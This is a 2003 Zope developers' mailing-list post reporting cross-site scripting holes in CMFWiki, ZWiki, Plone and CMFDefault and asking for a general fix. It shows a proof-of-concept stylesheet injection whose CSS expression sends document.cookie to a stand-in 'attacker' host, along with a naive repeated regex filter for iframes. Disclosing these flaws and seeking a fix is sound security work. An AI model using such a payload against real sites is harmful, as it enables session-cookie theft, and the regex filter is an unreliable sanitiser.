On Mon, 23 Jun 2003 01:20:35 -0700
Jamie Heilman <[EMAIL PROTECTED]> wrote:

> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
> apps, and apart from 1 and 3 there are probably legitimate bugs there.

related issues:

CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a,
as far as the site permits to anonymous users or person without good
references to write.
To cope with the matter, I stupidly put multiple string substitution.

    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
    t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)

It would be appreciated if someone advices me more general
and smart way.

I know that  Zope's StructuredText itself does not handle such a case,
and that kind of implementaition may be left to each developer.
If it had ability to avoid them, it would be much better, I think.

Another example
 Following sample may allow malicious.css import from outside
of the site. Put #1 or #2 to a StructuredText page.

 <LINK rel="stylesheet" href="http://attacker/malicious.css";>

 <STYLE type="text/css">
 @import url('http://attacker/malicious.css');

 # expample of malicious.css
  body { left: expression(eval(
        'document.location="http://attacker/"+document.cookie;')) }

For example, make a 'Document' in a CMFDefault site,
and put #1 to the reply form, DiscussionItem, against the original
document, etc. It seems CMFDefault is vulnerable to this attack.

Any general remedy for that kind of exploit?

Kazuya Fukamachi

Zope-Dev maillist  -  [EMAIL PROTECTED]
**  No cross posts or HTML encoding!  **
(Related lists - 
 http://mail.zope.org/mailman/listinfo/zope )

Reply via email to